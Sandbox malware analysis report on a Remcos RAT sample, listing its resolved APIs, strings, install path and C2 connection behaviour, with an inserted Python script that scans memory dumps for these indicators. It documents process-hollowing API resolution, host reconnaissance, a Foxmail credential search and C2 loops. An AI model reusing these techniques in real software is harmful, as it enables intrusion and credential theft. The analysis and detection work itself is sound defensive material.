• Instruction Fuzzy Hash: 59D18E31A00626AFDF24CF69CC84BAABBB5FF84710F258559E809AB655D730ED01CF94
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,123A50E4), ref: 1234B62A
• GetUserNameW.ADVAPI32(?,1233F223), ref: 1234B642
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Name$ComputerUser
• String ID:
• API String ID: 4229901323-0
• Opcode ID: 86509eb738ce0a1eb1136abff9244ab49420250181bb12c80c33164986ea8d78
• Instruction ID: 6173ee16fde0b6994bcfe581485862e024c8c4b1923c2b2a6a10c4aedaed7b54
• Opcode Fuzzy Hash: 86509eb738ce0a1eb1136abff9244ab49420250181bb12c80c33164986ea8d78
• Instruction Fuzzy Hash: 5F01FB7690021CABDB55DBD4DC44AEEB7BCEF48306F100266E506F6250EE746B89CBA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,123454FC,123A4EE0,123A5A00,123A4EE0,00000000,123A4EE0,00000000,123A4EE0,4.9.4 Pro), ref: 1233F8E5
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 07ccde7cb2427e67345b7c23eff0edbfd1de86d574345f50f4f93769b8bda7e1
• Instruction ID: 9f861203b342084a1ccb27f15bbce9e5630072aae20a14a9829f7a10d9fd651c
• Opcode Fuzzy Hash: 07ccde7cb2427e67345b7c23eff0edbfd1de86d574345f50f4f93769b8bda7e1
• Instruction Fuzzy Hash: F9D05B7174411C77D61096958C0AEAA779CD701752F000195FA09D72C0D9E16E0487D1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB65
• GetProcAddress.KERNEL32(00000000), ref: 1234CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB85
• GetProcAddress.KERNEL32(00000000), ref: 1234CB88
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CB9A
• GetProcAddress.KERNEL32(00000000), ref: 1234CB9D
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CBAE
• GetProcAddress.KERNEL32(00000000), ref: 1234CBB1
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1233E9E1), ref: 1234CBC3
• GetProcAddress.KERNEL32(00000000), ref: 1234CBC6
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1233E9E1), ref: 1234CBD2
• GetProcAddress.KERNEL32(00000000), ref: 1234CBD5
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1233E9E1), ref: 1234CBE6
• GetProcAddress.KERNEL32(00000000), ref: 1234CBE9
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1233E9E1), ref: 1234CBFA
• GetProcAddress.KERNEL32(00000000), ref: 1234CBFD
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1233E9E1), ref: 1234CC0E
• GetProcAddress.KERNEL32(00000000), ref: 1234CC11
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1233E9E1), ref: 1234CC22
• GetProcAddress.KERNEL32(00000000), ref: 1234CC25
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1233E9E1), ref: 1234CC36
• GetProcAddress.KERNEL32(00000000), ref: 1234CC39
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1233E9E1), ref: 1234CC4A
• GetProcAddress.KERNEL32(00000000), ref: 1234CC4D
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1233E9E1), ref: 1234CC5E
• GetProcAddress.KERNEL32(00000000), ref: 1234CC61
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1233E9E1), ref: 1234CC72
• GetProcAddress.KERNEL32(00000000), ref: 1234CC75
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1233E9E1), ref: 1234CC83
• GetProcAddress.KERNEL32(00000000), ref: 1234CC86
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,1233E9E1), ref: 1234CC97
• GetProcAddress.KERNEL32(00000000), ref: 1234CC9A
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,1233E9E1), ref: 1234CCA7
• GetProcAddress.KERNEL32(00000000), ref: 1234CCAA
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,1233E9E1), ref: 1234CCB7
• GetProcAddress.KERNEL32(00000000), ref: 1234CCBA
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,1233E9E1), ref: 1234CCCC
• GetProcAddress.KERNEL32(00000000), ref: 1234CCCF
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,1233E9E1), ref: 1234CCDC
• GetProcAddress.KERNEL32(00000000), ref: 1234CCDF
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,1233E9E1), ref: 1234CCF0
• GetProcAddress.KERNEL32(00000000), ref: 1234CCF3
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,1233E9E1), ref: 1234CD04
• GetProcAddress.KERNEL32(00000000), ref: 1234CD07
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,1233E9E1), ref: 1234CD19
• GetProcAddress.KERNEL32(00000000), ref: 1234CD1C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,1233E9E1), ref: 1234CD29
• GetProcAddress.KERNEL32(00000000), ref: 1234CD2C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,1233E9E1), ref: 1234CD39
• GetProcAddress.KERNEL32(00000000), ref: 1234CD3C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,1233E9E1), ref: 1234CD49
• GetProcAddress.KERNEL32(00000000), ref: 1234CD4C
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714
• Opcode ID: 4baaf5c3e7387ac0a81ed403d25744b597e15e9d773a65eee2ef65b5a2fe4c9f
• Instruction ID: 7456489cc43484c5d3ec09f90c01bb797c769d8619827c0c59b8df52cfa4e2c2
• Opcode Fuzzy Hash: 4baaf5c3e7387ac0a81ed403d25744b597e15e9d773a65eee2ef65b5a2fe4c9f
• Instruction Fuzzy Hash: C3415BF6CC136C7AEE106BBA4C88D9B3F5CD98A3953428C27E149E7510DA389801CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

(Rendered graph not captured; the executed/not-executed colouring of the nodes is lost.) Function at 1233e9c5, entry block 1233e9c5-1233ea47. Win32 APIs reached on the graph: GetModuleFileNameW in the entry block, CreateThread at several sites from 1233efc3 onward, StrToIntA in the block 1233efea-1233f0c6, SetProcessDEPPolicy at 1233f240, and a DeleteFileW/Sleep retry loop across 1233f32f-1233f34b (DeleteFileW, test, Sleep, back to DeleteFileW); every other node is an internal call in the 12331e65-1236fd00 range.
APIs
  • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB65
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CB6E
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB85
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CB88
  • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CB9A
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CB9D
  • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CBAE
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBB1
  • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1233E9E1), ref: 1234CBC3
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBC6
  • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1233E9E1), ref: 1234CBD2
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBD5
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1233E9E1), ref: 1234CBE6
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBE9
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1233E9E1), ref: 1234CBFA
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBFD
  • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1233E9E1), ref: 1234CC0E
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC11
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1233E9E1), ref: 1234CC22
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC25
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1233E9E1), ref: 1234CC36
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC39
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1233E9E1), ref: 1234CC4A
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC4D
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1233E9E1), ref: 1234CC5E
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC61
  • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1233E9E1), ref: 1234CC72
  • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC75
  • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1233E9E1), ref: 1234CC83
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000104), ref: 1233E9EE
  • Part of subcall function 12340F37: __EH_prolog.LIBCMT ref: 12340F3C
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: Access Level: $Administrator$C:\Users\Public\Libraries\wkrriuhD.pif$Exe$Exe$Inj$Remcos Agent initialized$Rmc-W5UGP5$Software\$User$del$del$exepath$licence$license_code.txt
• API String ID: 2830904901-2597219987
• Opcode ID: 532d45cd05ab86e21cd817842afe67e6c3263e9215f9a04fe4d1eed608f8d8a3
• Instruction ID: d3542d3a77953847e0b47a20ef9dca4d4ba795965cb8dade0f268c5e83b73a44
• Opcode Fuzzy Hash: 532d45cd05ab86e21cd817842afe67e6c3263e9215f9a04fe4d1eed608f8d8a3
• Instruction Fuzzy Hash: 34321B6BB543402FDABBA7709C65B7E26E94FC1B42F90092DE482DB1C0DE65AF01C761
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Rendered graph not captured; the executed/not-executed colouring of the nodes is lost.) Function at 12344f2a, entry block 12344f2a-12344f72. Win32/Winsock APIs reached on the graph: Sleep at 12344f74, WSAGetLastError at 1234518c on the error branch after the call to 12344ee9, GetTickCount inside the large block 123453c0-12345a0a, CreateThread at 12345a71, and a second Sleep at 12345ab7-12345ad7 whose successor branches back to 12345041, which is the reconnect loop; every other node is an internal call.
APIs
• Sleep.KERNEL32(00000000,00000029,123A52F0,123A50E4,00000000), ref: 12344F7B
• WSAGetLastError.WS2_32(00000000,00000001), ref: 1234518C
• Sleep.KERNEL32(00000000,00000002), ref: 12345AD7
  • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$4.9.4 Pro$C:\Users\Public\Libraries\wkrriuhD.pif$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-W5UGP5$TLS Off$TLS On $hlight$name
• API String ID: 524882891-2597379952
• Opcode ID: 273b4899063cd84ef6acc3986f5c622b8eee39aeb6a718b29788de49df5eb436
• Instruction ID: 05f54124d78cf9ab05fd714021012dd6a1a2eda3484bd20dbe95fdd5c2c57b3e
• Opcode Fuzzy Hash: 273b4899063cd84ef6acc3986f5c622b8eee39aeb6a718b29788de49df5eb436
• Instruction Fuzzy Hash: 65523C3BA002145BDB6AE731DC91AFEB3B59F50302F6046A9D40AA61E4EF307F49CB51
Uniqueness

Uniqueness Score: -1.00%
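The three records above (the run-time API resolver at 1234CB50, the agent strings in the 1233E9C5 record, and the connection-status strings in the 12344F2A record) give enough fixed strings to triage other dumps of this process, or of other samples, for the same family. The Python below is an added example for that purpose; it is not Joe Sandbox output and not code from Remcos or DBatLoader. It reads a raw dump such as the .sdmp files linked above, extracts ASCII and UTF-16LE strings, and matches them against those indicators. The sample dump it runs on is constructed inline. The `Rmc-<id>` pattern, the `<major>.<minor>.<patch> Pro` version pattern and the generalised `.pif` path under `C:\Users\Public\Libraries` are assumptions that generalise the single values on the page (Rmc-W5UGP5, 4.9.4 Pro, wkrriuhD.pif), and the verdict thresholds are this example's own choice.

```python
"""Triage a raw process memory dump for the Remcos indicators in this report.

Added example: not Joe Sandbox output and not Remcos or DBatLoader code.
Reads a dump such as the .sdmp files linked in the report, pulls printable
ASCII and UTF-16LE strings, and matches them against the names the report
recovered from the 12330000 region of process 24.
"""
import re
import sys
from dataclasses import dataclass, field

# Resolved at run time by the subcall at 1234CB50 (LoadLibraryA/GetModuleHandleA
# followed by GetProcAddress). The ntdll set is what an injector needs to
# suspend a target, unmap its image and resume it; on its own it is not
# family-specific, so it is scored separately below.
HOLLOWING_APIS = ("NtUnmapViewOfSection", "NtSuspendProcess", "NtResumeProcess",
                  "NtQueryInformationProcess")
RECON_APIS = ("GetExtendedTcpTable", "GetExtendedUdpTable", "IsUserAnAdmin",
              "IsWow64Process", "GetProcessImageFileNameW", "GetComputerNameExW",
              "EnumDisplayMonitors", "SetProcessDEPPolicy")
# Agent strings from the initialisation routine at 1233E9C5.
AGENT_MARKERS = ("Remcos Agent initialized", "license_code.txt", "Access Level:",
                 "exepath", "licence")
# Status strings from the connection loop at 12344F2A.
C2_STATUS = ("Connecting |", "Connected |", "Disconnected", "TLS On", "TLS Off",
             "Connection Error: Unable to create socket")
# Assumptions that generalise the single values on the page: an alphanumeric id
# after "Rmc-", a "<major>.<minor>.<patch> Pro" version, and any .pif name under
# C:\Users\Public\Libraries.
RMC_NAME_RE = re.compile(r"Rmc-[0-9A-Za-z]{4,}")
VERSION_RE = re.compile(r"\d+\.\d+\.\d+ Pro")
PIF_PATH_RE = re.compile(r"C:\\Users\\Public\\Libraries\\[^\\\s]+\.pif")

ASCII_RUN = re.compile(rb"[\x20-\x7e]{5,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){5,}")


def extract_strings(data: bytes) -> list:
    """Printable ASCII and UTF-16LE runs of at least five characters."""
    out = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    out += [m.group().decode("utf-16-le") for m in WIDE_RUN.finditer(data)]
    return out


@dataclass
class Triage:
    hollowing: set = field(default_factory=set)
    recon: set = field(default_factory=set)
    agent: set = field(default_factory=set)
    c2_status: set = field(default_factory=set)
    rmc_names: set = field(default_factory=set)
    versions: set = field(default_factory=set)
    pif_paths: set = field(default_factory=set)
    verdict: str = "no-match"


def triage(data: bytes) -> Triage:
    """Match every extracted string against the indicator sets and score."""
    t = Triage()
    for s in extract_strings(data):
        t.hollowing.update(a for a in HOLLOWING_APIS if a in s)
        t.recon.update(a for a in RECON_APIS if a in s)
        t.agent.update(m for m in AGENT_MARKERS if m in s)
        t.c2_status.update(m for m in C2_STATUS if m in s)
        t.rmc_names.update(RMC_NAME_RE.findall(s))
        t.versions.update(VERSION_RE.findall(s))
        t.pif_paths.update(PIF_PATH_RE.findall(s))
    # Thresholds are this example's choice: agent strings or the Rmc- name
    # identify the family; the ntdll triad alone only says "injector".
    if t.agent or t.rmc_names or len(t.c2_status) >= 3:
        t.verdict = "remcos"
    elif len(t.hollowing) >= 3:
        t.verdict = "process-hollowing-capable"
    return t


# Constructed sample, not a real dump: report strings laid out null-separated,
# one UTF-16LE path, and a few opcode-like junk bytes.
SAMPLE_DUMP = b"\x00".join([
    b"\x8b\xff\x55\x8b\xec\x83\xec\x10",
    b"Psapi", b"GetProcessImageFileNameW", b"ntdll", b"NtUnmapViewOfSection",
    b"NtSuspendProcess", b"NtResumeProcess", b"Iphlpapi", b"GetExtendedTcpTable",
    b"Shell32", b"IsUserAnAdmin", b"Remcos Agent initialized", b"Rmc-W5UGP5",
    b"Software\\", b"exepath", b"licence", b"license_code.txt", b"Access Level: ",
    b"Administrator", b"4.9.4 Pro", b"Connecting | ", b"Connected | ", b"TLS On ",
    b"TLS Off", b"Connection Error: Unable to create socket",
    "C:\\Users\\Public\\Libraries\\wkrriuhD.pif".encode("utf-16-le"),
    b"\xcc\xcc\xcc\xcc",
])
# Constructed benign blob: ordinary import names that any PE resolves.
CLEAN_DUMP = b"\x00".join([b"kernel32.dll", b"GetProcAddress", b"LoadLibraryA",
                           b"Hello, world", b"\xcc\xcc\xcc\xcc"])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    r = triage(blob)
    print(r.verdict, sorted(r.rmc_names), sorted(r.versions), sorted(r.pif_paths))
    print("hollowing:", sorted(r.hollowing), "c2 strings:", len(r.c2_status))
```

Run it as `python <script> <dump.sdmp>`; with no argument it triages the embedded sample. Read a hit on the ntdll triad alone as "injector", not "Remcos": many loaders resolve the same three calls, and the family verdict in this script deliberately needs the agent strings or the Rmc- name.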

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 14641434
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 14641137
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrcatW.KERNEL32(?,?), ref: 14641151
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464115C
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464116D
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464117C
                                                                                                                                                                                            • Part of subcall function 146410F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 14641193
                                                                                                                                                                                            • Part of subcall function 146410F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 146411D0
                                                                                                                                                                                            • Part of subcall function 146410F1: FindClose.KERNEL32(00000000), ref: 146411DB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 146414C5
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 146414E0
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1464150F
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 14641521
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 14641547
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 14641553
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 14641579
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 14641585
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 146415AB
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 146415B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                          • Opcode ID: 815d51095885201ce6321a561dd3b7f1f5faaa881f8a3e58b7ffaca124c31345
                                                                                                                                                                                          • Instruction ID: 4c34dc5330490b30a1996495ec49b4bce4ed29a3a5b05c81d1c187b68eaf6484
                                                                                                                                                                                          • Opcode Fuzzy Hash: 815d51095885201ce6321a561dd3b7f1f5faaa881f8a3e58b7ffaca124c31345
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B81E675A00368AAEF20DBA0DC49FDF7739EF44744F140596F508EB190EAB15A84CF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • connect.WS2_32(FFFFFFFF,124892B8,00000010), ref: 123348E0
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 12334A00
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 12334A0E
                                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 12334A21
                                                                                                                                                                                            • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                          • API String ID: 994465650-2151626615
                                                                                                                                                                                          • Opcode ID: 090fa5f297dbacd48fc960daf6604c05599e1c2859d11396530a686f6f986cce
                                                                                                                                                                                          • Instruction ID: 1df8e58442a5ea6dde0084a49e1a2fb6a8a09e629227ec4bfe55ddefe7941de7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 090fa5f297dbacd48fc960daf6604c05599e1c2859d11396530a686f6f986cce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 57418E7FB00206ABEB66777ACC4597DBB5AEB42311B804218D50347695EE21FE14C7E3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,123A4EF8,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E38
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E43
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E4C
                                                                                                                                                                                          • closesocket.WS2_32(FFFFFFFF), ref: 12334E5A
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E91
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EA2
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EA9
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EBA
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EBF
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EC4
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334ED1
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334ED6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
